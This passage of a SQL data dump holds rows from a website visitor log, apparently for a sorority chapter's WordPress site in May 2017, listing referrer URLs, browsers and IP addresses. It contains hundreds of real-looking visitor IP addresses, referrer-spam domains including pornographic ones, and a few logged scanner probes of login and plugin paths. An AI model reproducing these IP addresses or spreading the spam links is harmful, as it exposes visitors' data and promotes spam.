org','Chrome','Windows','5.0.375.99','','89.184.73.19','000',1,0),(3850,'2017-05-01','http://mygameplus.com/','MSIE','Windows','6.0','','178.137.4.41','000',1,0),(3851,'2017-05-01','http://zphiblgz.org','Firefox','Windows','40.1','','188.250.85.134','000',2,0),(3852,'2017-05-01','zphiblgz.org','Chrome','Windows','5.0.375.99','','193.151.90.22','000',1,0),(3853,'2017-05-01','zphiblgz.org','Chrome','Windows','5.0.375.99','','78.24.217.104','000',1,0),(3854,'2017-05-01','http://yoshkarola.zrus.org/','MSIE','Windows','4.01','','46.118.115.123','000',1,0),(3855,'2017-05-01','https://ascat.porn/','MSIE','Windows','6.0','','46.119.118.191','000',3,0),(3856,'2017-05-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','212.227.29.142','000',1,0),(3857,'2017-05-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','204.152.255.27','000',1,0),(3858,'2017-05-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','70.40.221.39','000',1,0),(3859,'2017-05-01','http://zphiblgz.org','Firefox','Windows','34.0','','5.139.164.67','000',2,0),(3860,'2017-05-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','216.51.232.61','000',1,0),(3861,'2017-05-01','http://zphiblgz.org','Firefox','Windows','34.0','','5.18.206.169','000',2,0),(3862,'2017-05-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.62.226.24','000',1,0),(3863,'2017-05-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','192.252.144.30','000',1,0),(3864,'2017-05-01','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.119','000',1,0),(3865,'2017-05-01','http://bit.ly/2pCT2mJ','Firefox','Windows','52.0','','95.181.177.20','000',1,0),(3866,'2017-05-01','http://zphiblgz.org','Firefox','Windows','34.0','','198.204.244.34','000',1,0),(3867,'2017-05-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','104.254.244.80','000',2,0),(3868,'2017-05-01','http://sstroy44.ru/','MSIE','Windows','5.5','','46.119.112.125','000',5,0),(3869,'2017-05-01','http://zphiblgz.org','Chrome','Windows','58.0.3029.81','','50.225.39.76','000',3,0),(3870,'2017-05-01','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','166.91.253.18','000',5,0),(3871,'2017-05-01','http://zphiblgz.org','MSIE','Windows','9.0','','65.55.212.85','000',1,0),(3872,'2017-05-01','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','216.19.217.160','000',1,0),(3873,'2017-05-01','http://zphiblgz.org','Firefox','Windows','40.1','','41.205.41.5','000',1,0),(3874,'2017-05-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.56.110','000',1,0),(3875,'2017-05-01','http://zphiblgz.org/','Firefox','Windows','7.0.1','','46.105.100.149','000',1,0),(3876,'2017-05-01','http://zphiblgz.org','Firefox','Windows','40.1','','177.204.40.234','000',1,0),(3877,'2017-05-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.118','000',1,0),(3878,'2017-05-01','http://zphiblgz.org','Pinterest','Unknown','0.2','','54.236.1.11','000',1,0),(3879,'2017-05-01','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','172.241.151.28','000',1,0),(3880,'2017-05-01','http://zphiblgz.org','Firefox','Windows','34.0','','84.22.36.41','000',2,0),(3881,'2017-05-01','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','107.77.241.5','000',1,0),(3882,'2017-05-01','http://namenectar.com/','MSIE','Windows','5.5','','46.118.115.123','000',1,0),(3883,'2017-05-01','http://tula.zrus.org/','Opera','Windows','9.00','','46.119.118.191','000',1,0),(3884,'2017-05-01','http://zphiblgz.org/','Firefox','Windows','44.0','','146.185.223.87','000',2,0),(3885,'2017-05-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.172.193.32','000',2,0),(3886,'2017-05-01','http://zphiblgz.org','Firefox','Windows','40.1','','110.172.128.54','000',2,0),(3887,'2017-05-01','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(3888,'2017-05-01','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(3889,'2017-05-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','217.170.201.106','000',1,0),(3890,'2017-05-01','http://zphiblgz.org/','Firefox','Windows','7.0.1','','109.201.133.100','000',1,0),(3891,'2017-05-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.165.223.217','000',1,0),(3892,'2017-05-01','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.38.14.215','000',1,0),(3893,'2017-05-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.72','000',2,0),(3894,'2017-05-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','137.74.169.241','000',2,0),(3895,'2017-05-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.220.35.202','000',1,0),(3896,'2017-05-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','217.115.10.132','000',2,0),(3897,'2017-05-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.205','000',1,0),(3898,'2017-05-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.62.146','000',2,0),(3899,'2017-05-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.117.215.9','000',1,0),(3900,'2017-05-01','http://zphiblgz.org/','Firefox','Windows','7.0.1','','192.42.116.16','000',1,0),(3901,'2017-05-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.31.57.5','000',2,0),(3902,'2017-05-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','168.1.99.210','000',1,0),(3903,'2017-05-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.165.230.5','000',1,0),(3904,'2017-05-01','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.50.10','000',1,0),(3905,'2017-05-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.195.107.250','000',1,0),(3906,'2017-05-01','http://zphiblgz.org/','Firefox','Windows','7.0.1','','178.17.170.195','000',1,0),(3907,'2017-05-01','http://vykupavto-krasnodar.ru/','Opera','Windows','8.01','','178.137.4.41','000',2,0),(3908,'2017-05-01','http://zphiblgz.org','Chrome','Windows','58.0.3029.81','','100.36.85.182','000',3,0),(3909,'2017-05-01','http://zphiblgz.org','Firefox','Windows','40.1','','101.190.196.171','000',2,0),(3910,'2017-05-01','https://inome.com.ua/','MSIE','Unknown','7.0b','','46.119.112.125','000',3,0),(3911,'2017-05-01','http://zphiblgz.org','Firefox','Windows','40.1','','93.44.199.195','000',2,0),(3912,'2017-05-01','http://zona-aqua.ru/','MSIE','Windows','6.0','','37.229.253.129','000',3,0),(3913,'2017-05-01','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','107.77.241.9','000',1,0),(3914,'2017-05-01','http://zphiblgz.org','Firefox','Windows','40.1','','41.102.87.1','000',2,0),(3915,'2017-05-01','http://zphiblgz.org/','Opera Next','Windows','35.0.2066.37','','95.31.58.46','000',4,0),(3916,'2017-05-01','http://zphiblgz.org','Firefox','Windows','40.1','','49.145.128.185','000',2,0),(3917,'2017-05-01','http://zphiblgz.org','Firefox','Windows','40.1','','105.158.189.40','000',2,0),(3918,'2017-05-01','https://www.google.com/','Safari','iPhone','10.0','','166.137.252.115','000',1,0),(3919,'2017-05-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','213.251.182.107','000',1,0),(3920,'2017-05-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','85.94.76.21','000',1,0),(3921,'2017-05-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','195.63.61.210','000',1,0),(3922,'2017-05-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','188.116.33.163','000',1,0),(3923,'2017-05-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','66.33.199.153','000',1,0),(3924,'2017-05-01','https://www.google.com/','Chrome','Windows','57.0.2987.133','','107.210.32.95','000',2,0),(3925,'2017-05-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','91.230.204.77','000',1,0),(3926,'2017-05-01','http://zphiblgz.org','MSIE','Windows','9.0','','88.198.22.8','000',1,0),(3927,'2017-05-01','http://zphiblgz.org','Firefox','Windows','30.0','','213.239.205.118','000',1,0),(3928,'2017-05-01','http://zphiblgz.org','Firefox','Windows','34.0','','217.118.91.60','000',2,0),(3929,'2017-05-01','http://zphiblgz.org','Chrome','Windows','34.0.1832.1','','213.239.205.118','000',5,0),(3930,'2017-05-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.125','000',1,0),(3931,'2017-05-01','http://zphiblgz.org','Chrome','Windows','32.0.1700.102','','213.239.205.118','000',2,0),(3932,'2017-05-02','http://cheboksary.zrus.org/','Opera','Windows','7.54','','46.118.115.123','000',1,0),(3933,'2017-05-02','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','172.241.151.21','000',1,0),(3934,'2017-05-02','http://zphiblgz.org','Firefox','Windows','34.0','','177.70.67.222','000',2,0),(3935,'2017-05-02','http://zphiblgz.org','CATExplorador','Unknown','1.0beta','','45.63.115.41','000',2,0),(3936,'2017-05-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','77.68.11.158','000',2,0),(3937,'2017-05-02','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','MSIE','Windows','9.0','','5.61.34.51','000',1,0),(3938,'2017-05-02','http://zphiblgz.org/wp-admin/','MSIE','Windows','8.0','','5.61.34.51','000',1,0),(3939,'2017-05-02','http://xn------7cdbapdecfd4ak1bn0amjffj7afu3y.xn--p1ai/','Unknown','Unknown','Unknown','','178.137.4.41','000',1,0),(3940,'2017-05-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','64.92.209.30','000',2,0),(3941,'2017-05-02','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj21tzguNHTAhUBxSYKHZ8mC7EQFgghMAA&url=http%3A%2F%2Fzphiblgz.org%2Fscholarship%2F&usg=AFQjCNGGuWy2KSIOcbzM6-Bb9Xl9Kf1gjQ','MSIE','Windows','11.0','','205.222.248.81','000',1,0),(3942,'2017-05-02','http://zphiblgz.org','Chrome','Windows','58.0.3029.81','','204.126.132.241','000',7,0),(3943,'2017-05-02','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','149.202.216.235','000',1,0),(3944,'2017-05-02','http://zphiblgz.org','Firefox','Windows','40.1','','203.87.133.254','000',2,0),(3945,'2017-05-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.172.193.32','000',3,0),(3946,'2017-05-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','97.79.238.233','000',1,0),(3947,'2017-05-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.182.18.46','000',2,0),(3948,'2017-05-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','173.254.216.66','000',2,0),(3949,'2017-05-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','184.168.193.98','000',1,0),(3950,'2017-05-02','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','107.77.241.12','000',16,0),(3951,'2017-05-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','50.62.161.77','000',1,0),(3952,'2017-05-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','66.147.244.233','000',1,0),(3953,'2017-05-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','79.170.44.141','000',1,0),(3954,'2017-05-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','37.187.26.44','000',1,0),(3955,'2017-05-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','77.247.181.163','000',2,0),(3956,'2017-05-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.101.137','000',1,0),(3957,'2017-05-02','http://zphiblgz.org/','Firefox','Windows','7.0.1','','192.42.116.16','000',1,0),(3958,'2017-05-02','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',2,0),(3959,'2017-05-02','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(3960,'2017-05-02','http://prohoster.info/hosting/constructor','MSIE','Windows','6.0','','37.229.253.129','000',1,0),(3961,'2017-05-02','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','93.174.93.80','000',1,0),(3962,'2017-05-02','http://zphiblgz.org','curl','Unknown','7.47.0','','93.174.93.80','000',1,0),(3963,'2017-05-02','http://kostroma.zrus.org/','MSIE','Windows','6.0','','46.118.115.123','000',2,0),(3964,'2017-05-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','130.226.169.137','000',2,0),(3965,'2017-05-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','95.141.37.107','000',2,0),(3966,'2017-05-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.166.139.71','000',1,0),(3967,'2017-05-02','http://zphiblgz.org/','Firefox','Windows','7.0.1','','64.124.32.84','000',1,0),(3968,'2017-05-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','45.62.243.135','000',2,0),(3969,'2017-05-02','http://zphiblgz.org','Firefox','Windows','40.1','','203.115.144.34','000',2,0),(3970,'2017-05-02','https://ascat.porn/','MSIE','Windows','6.0','','46.119.118.191','000',2,0),(3971,'2017-05-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','151.80.38.67','000',1,0),(3972,'2017-05-02','http://zphiblgz.org/','Firefox','Windows','7.0.1','','109.163.234.7','000',1,0),(3973,'2017-05-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.10.104.243','000',2,0),(3974,'2017-05-02','http://zphiblgz.org/','Firefox','Windows','7.0.1','','209.222.77.220','000',1,0),(3975,'2017-05-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.5','000',1,0),(3976,'2017-05-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','137.74.167.96','000',2,0),(3977,'2017-05-02','http://www.zphibmaryland.org/chapters/','Chrome','Android','57.0.2987.132','','98.252.56.15','000',7,0),(3978,'2017-05-02','https://www.google.com/','Safari','iPhone','10.0','','73.39.240.141','000',4,0),(3979,'2017-05-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.239.50.48','000',2,0),(3980,'2017-05-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','172.3.160.122','000',2,0),(3981,'2017-05-02','http://zphiblgz.org','Firefox','Windows','40.1','','177.138.101.191','000',2,0),(3982,'2017-05-02','http://zphiblgz.org/','Firefox','Windows','7.0.1','','109.163.234.4','000',1,0),(3983,'2017-05-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','137.74.168.110','000',2,0),(3984,'2017-05-02','http://zphiblgz.org','Firefox','Windows','40.1','','106.51.153.143','000',2,0),(3985,'2017-05-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','217.115.10.132','000',1,0),(3986,'2017-05-03','http://zphiblgz.org/','Firefox','Windows','7.0.1','','65.19.167.130','000',1,0),(3987,'2017-05-03','http://www.zphiblgz.org','Chrome','Windows','39.0.2171.95','','104.192.74.46','000',27,0),(3988,'2017-05-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','104.192.74.46','000',24,0),(3989,'2017-05-03','http://cheboksary.zrus.org/','MSIE','Windows','6.0','','46.118.115.123','000',5,0),(3990,'2017-05-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','198.204.244.162','000',1,0),(3991,'2017-05-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.223.27.241','000',1,0),(3992,'2017-05-03','http://zphiblgz.org/','Firefox','Windows','7.0.1','','37.220.35.202','000',1,0),(3993,'2017-05-03','http://zphiblgz.org','libwww-perl','Unknown','6.15','','185.7.214.52','000',1,0),(3994,'2017-05-03','http://ivanstroi.ru/','Opera','Windows','7.11','','46.119.118.191','000',1,0),(3995,'2017-05-03','http://zphiblgz.org','Firefox','Windows','40.1','','117.20.48.244','000',2,0),(3996,'2017-05-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','37.59.18.149','000',2,0),(3997,'2017-05-03','http://zphiblgz.org','Firefox','Windows','40.1','','71.167.175.84','000',2,0),(3998,'2017-05-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','184.168.46.19','000',1,0),(3999,'2017-05-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','77.245.149.18','000',1,0),(4000,'2017-05-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','50.63.196.156','000',1,0),(4001,'2017-05-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','108.179.252.45','000',1,0),(4002,'2017-05-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.204','000',3,0),(4003,'2017-05-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','216.172.189.70','000',1,0),(4004,'2017-05-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','72.172.221.120','000',1,0),(4005,'2017-05-03','http://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','54.245.162.168','000',2,0),(4006,'2017-05-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.120.147.171','000',2,0),(4007,'2017-05-03','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','107.77.241.10','000',2,0),(4008,'2017-05-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.86.100','000',1,0),(4009,'2017-05-03','http://zphiblgz.org','AppleWebKit','Linux','534.34','','54.166.179.103','000',3,0),(4010,'2017-05-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.254.207.17','000',2,0),(4011,'2017-05-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.62.188.139','000',1,0),(4012,'2017-05-03','http://zphiblgz.org/','Firefox','Windows','7.0.1','','193.70.95.180','000',1,0),(4013,'2017-05-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.101.127.145','000',1,0),(4014,'2017-05-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.129.246','000',2,0),(4015,'2017-05-03','http://zphiblgz.org','Firefox','Windows','3.6','','162.214.14.216','000',6,0),(4016,'2017-05-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.219.236.232','000',1,0),(4017,'2017-05-03','http://zphiblgz.org/','Firefox','Windows','7.0.1','','46.165.230.5','000',1,0),(4018,'2017-05-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.29.8.211','000',2,0),(4019,'2017-05-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','69.58.178.59','000',12,0),(4020,'2017-05-03','http://zajm-zalog-krasnodar.ru/','MSIE','Windows','6.0','','46.119.112.125','000',3,0),(4021,'2017-05-03','http://l.facebook.com/l.php?u=http%3A%2F%2Fwww.zphiblgz.org%2F&h=ATNcuJrGLTHbnj9Q0uv_1_E9PklJtZq7txQ3g11bBPU2oRBulORsVd1uvdaZS8LfuYgjNgZ8tXeiTYoTtKyxm9PHAa2qhFd9U8-kUQ','Chrome','Linux','54.0.2840.59','','66.220.145.245','000',3,0),(4022,'2017-05-03','http://l.facebook.com/l.php?u=http%3A%2F%2Fwww.zphiblgz.org%2F&h=ATMuJxbptaJBNwDy4oCSVmMlY8s0SpgFy-dAqI14I90WbI8x952KtDzfpvIfbUUWGBLnhkXDWnrQfx6qft5zQqHDiyGQkFGUmyFNMQ','Chrome','Linux','54.0.2840.59','','66.220.145.243','000',1,0),(4023,'2017-05-03','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',2,0),(4024,'2017-05-03','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',2,0),(4025,'2017-05-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.170.42.4','000',1,0),(4026,'2017-05-03','http://zphiblgz.org','MSIE','Windows','11.0','','196.52.84.75','000',3,0),(4027,'2017-05-03','http://zphiblgz.org','Safari','iPhone','10.0','','73.213.22.160','000',4,0),(4028,'2017-05-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','64.137.246.162','000',2,0),(4029,'2017-05-03','http://mnogabukaff.net/','MSIE','Windows','6.0','','46.119.118.191','000',2,0),(4030,'2017-05-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.5','000',1,0),(4031,'2017-05-03','http://zphiblgz.org/','Firefox','Windows','7.0.1','','138.68.96.37','000',1,0),(4032,'2017-05-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(4033,'2017-05-03','https://www.google.com/','Safari','Macintosh','10.1','','73.134.31.136','000',1,0),(4034,'2017-05-03','http://zona-aqua.ru/','MSIE','Windows','6.0','','37.229.253.129','000',3,0),(4035,'2017-05-03','https://www.country-chic.ru/','MSIE','Windows','6.0','','178.137.4.41','000',1,0),(4036,'2017-05-04','http://jjbabskoe.ru/','MSIE','Windows','7.0b','','46.119.112.125','000',2,0),(4037,'2017-05-04','http://zphiblgz.org','Firefox','Windows','40.1','','190.77.231.88','000',2,0),(4038,'2017-05-04','http://bestdraws.com/','MSIE','Windows','7.0a1','','46.118.115.123','000',1,0),(4039,'2017-05-04','http://zphiblgz.org','Unknown','Unknown','Unknown','','150.70.172.237','000',2,0),(4040,'2017-05-04','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','178.137.83.79','000',7,0),(4041,'2017-05-04','https://google.com/','Firefox','Linux','26.0','','188.165.2.183','000',1,0),(4042,'2017-05-04','http://zphiblgz.org','MSIE','Windows','11.0','','116.22.165.112','000',3,0),(4043,'2017-05-04','http://zphiblgz.org','Firefox','Windows','40.1','','60.53.41.228','000',2,0),(4044,'2017-05-04','http://surgut.zrus.org/','Unknown','Unknown','Unknown','','46.118.155.24','000',3,0),(4045,'2017-05-04','http://zphiblgz.org','Firefox','Windows','40.1','','82.191.101.190','000',2,0),(4046,'2017-05-04','http://zphiblgz.org/','Safari','Macintosh','10.0.3','','62.212.68.156','000',1,0),(4047,'2017-05-04','http://zphiblgz.org/login.php?login=cmd','Chrome','Windows','42.0.2311.152','','163.172.108.151','000',1,0),(4048,'2017-05-04','http://zphiblgz.org/','MSIE','Windows','6.0','','172.245.10.85','000',1,0),(4049,'2017-05-04','http://kazan.zrus.org/','MSIE','Windows','7.0','','46.119.117.60','000',1,0),(4050,'2017-05-04','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.143','','84.119.187.132','000',1,0),(4051,'2017-05-04','https://www.google.com/','Chrome','Windows','57.0.2987.133','','160.111.254.17','000',2,0),(4052,'2017-05-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.126.252.11','000',1,0),(4053,'2017-05-04','http://zphiblgz.org/','Firefox','Windows','7.0.1','','128.52.128.105','000',1,0),(4054,'2017-05-04','https://www.google.com/','Chrome','Windows','57.0.2987.133','','12.39.214.6','000',1,0),(4055,'2017-05-04','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','154.16.89.10','000',1,0),(4056,'2017-05-04','http://xn-----6kccaibs5cb8afhjrfmix2n.xn--p1ai/','MSIE','Windows','5.5','','178.137.4.41','000',1,0),(4057,'2017-05-04','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.37','000',1,0),(4058,'2017-05-04','http://zphiblgz.org','Opera','Windows','8.50','','104.238.169.31','000',1,0),(4059,'2017-05-04','http://vipms.ru/','MSIE','Windows','7.0b','','178.137.4.41','000',2,0),(4060,'2017-05-04','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(4061,'2017-05-04','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',1,0),(4062,'2017-05-04','http://www.zphibmaryland.org/chapters/','Chrome','Windows','58.0.3029.81','','134.192.191.243','000',2,0),(4063,'2017-05-04','http://zphiblgz.org','MSIE','Windows','11.0','','89.248.172.48','000',1,0),(4064,'2017-05-04','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','MSIE','Windows','9.0','','5.61.32.26','000',1,0),(4065,'2017-05-04','http://zphiblgz.org/wp-admin/','MSIE','Windows','8.0','','5.61.32.26','000',1,0),(4066,'2017-05-04','http://zphiblgz.org','Firefox','Linux','37.0','','172.87.255.127','000',2,0),(4067,'2017-05-04','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','172.241.151.19','000',1,0),(4068,'2017-05-04','http://zphiblgz.org','MSIE','Windows','11.0','','196.52.84.75','000',3,0),(4069,'2017-05-04','http://zphiblgz.org','Firefox','Windows','40.1','','112.198.64.42','000',2,0),(4070,'2017-05-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.87.154.255','000',1,0),(4071,'2017-05-05','http://zphiblgz.org/','Firefox','Windows','7.0.1','','178.17.171.43','000',1,0),(4072,'2017-05-05','http://prohoster.info/server/dts-prohoster','Opera','Windows','8.00','','37.229.253.129','000',3,0),(4073,'2017-05-05','http://zphiblgz.org','Opera','Windows','8.50','','37.58.52.5','000',7,0),(4074,'2017-05-05','http://zphiblgz.org','Firefox','Windows','40.1','','106.181.156.15','000',2,0),(4075,'2017-05-05','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.117.10','000',2,0),(4076,'2017-05-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','94.142.242.84','000',1,0),(4077,'2017-05-05','http://bad-stars.net/','Opera','Windows','7.54','','178.137.4.41','000',2,0),(4078,'2017-05-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','139.162.228.61','000',1,0),(4079,'2017-05-05','http://zphiblgz.org/','Firefox','Windows','7.0.1','','78.109.23.1','000',1,0),(4080,'2017-05-05','http://nefteyugansk.zrus.org/','MSIE','Unknown','6.0','','46.119.117.60','000',2,0),(4081,'2017-05-05','http://zphiblgz.org','Chrome','Macintosh','55.0.2883.95','','52.87.86.158','000',1,0),(4082,'2017-05-05','http://yaroslavl.zrus.org/','MSIE','Windows','6.0','','46.119.117.60','000',1,0),(4083,'2017-05-05','http://zphiblgz.org','Firefox','Windows','40.1','','177.17.248.178','000',2,0),(4084,'2017-05-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.42.116.16','000',2,0),(4085,'2017-05-05','http://www.pornosee.info/','MSIE','Windows','6.0','','46.118.155.24','000',2,0),(4086,'2017-05-05','http://www.bing.com/search?q=lambda+gamma+zeta&src=IE-TopResult&FORM=IETR02&conversationid=','MSIE','Windows','11.0','','205.222.248.62','000',4,0),(4087,'2017-05-05','https://www.google.com/','Chrome','Windows','58.0.3029.96','','50.225.39.88','000',3,0),(4088,'2017-05-05','http://zphiblgz.org','Firefox','Windows','40.1','','68.199.64.207','000',2,0),(4089,'2017-05-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','196.54.55.14','000',1,0),(4090,'2017-05-05','http://zphiblgz.org/','Firefox','Windows','7.0.1','','79.134.234.247','000',1,0),(4091,'2017-05-05','http://zphiblgz.org','Firefox','Windows','40.1','','197.159.210.197','000',2,0),(4092,'2017-05-05','http://zphiblgz.org','Firefox','Windows','40.1','','112.133.236.140','000',2,0),(4093,'2017-05-05','http://zphiblgz.org','Firefox','Windows','40.1','','94.55.160.237','000',2,0),(4094,'2017-05-05','http://zphiblgz.org','Firefox','Windows','40.1','','45.123.108.195','000',2,0),(4095,'2017-05-05','http://zphiblgz.org','MSIE','Windows','11.0','','196.52.84.75','000',3,0),(4096,'2017-05-05','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(4097,'2017-05-05','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(4098,'2017-05-05','http://www.google.com/','Chrome','Android','58.0.3029.83','','66.249.83.85','000',1,0),(4099,'2017-05-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.74','000',2,0),(4100,'2017-05-05','http://arenda-avtoprokat-krasnodar.ru/','Opera','Windows','8.00','','46.118.155.24','000',1,0),(4101,'2017-05-05','http://zphiblgz.org/contact/','Chrome','Windows','30.0.1599.13014','','173.192.222.235','000',3,0),(4102,'2017-05-05','http://zphiblgz.org','Unknown','Unknown','Unknown','','41.185.8.160','000',1,0),(4103,'2017-05-05','http://zphiblgz.org','Unknown','Unknown','Unknown','','176.74.24.30','000',1,0),(4104,'2017-05-05','http://zphiblgz.org','Unknown','Unknown','Unknown','','216.64.158.69','000',1,0),(4105,'2017-05-05','http://zphiblgz.org','Unknown','Unknown','Unknown','','50.63.197.202','000',1,0),(4106,'2017-05-05','http://zphiblgz.org','Unknown','Unknown','Unknown','','37.187.26.44','000',1,0),(4107,'2017-05-05','http://tuapse.zrus.org/','MSIE','Windows','5.0','','46.118.155.24','000',3,0),(4108,'2017-05-05','http://yoshkarola.zrus.org/','MSIE','Windows','5.5','','46.119.117.60','000',2,0),(4109,'2017-05-05','http://elvel.com.ua/girobordy','Opera','Windows','9.00','','46.118.116.168','000',1,0),(4110,'2017-05-05','http://zphiblgz.org','Firefox','Windows','40.1','','196.206.255.166','000',2,0),(4111,'2017-05-05','http://vektorpress.ru/','MSIE','Windows','5.0','','46.118.116.168','000',2,0),(4112,'2017-05-05','http://zphiblgz.org/wp-content/plugins/logo_img.php','Chrome','Windows','42.0.2311.152','','163.172.107.12','000',1,0),(4113,'2017-05-05','http://zphiblgz.org','Unknown','Unknown','Unknown','','130.211.102.243','000',2,0),(4114,'2017-05-05','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','171.25.193.77','000',4,0),(4115,'2017-05-05','http://zphiblgz.org','Firefox','Windows','40.1','','117.220.72.121','000',2,0),(4116,'2017-05-05','http://www.zphibmaryland.org/chapters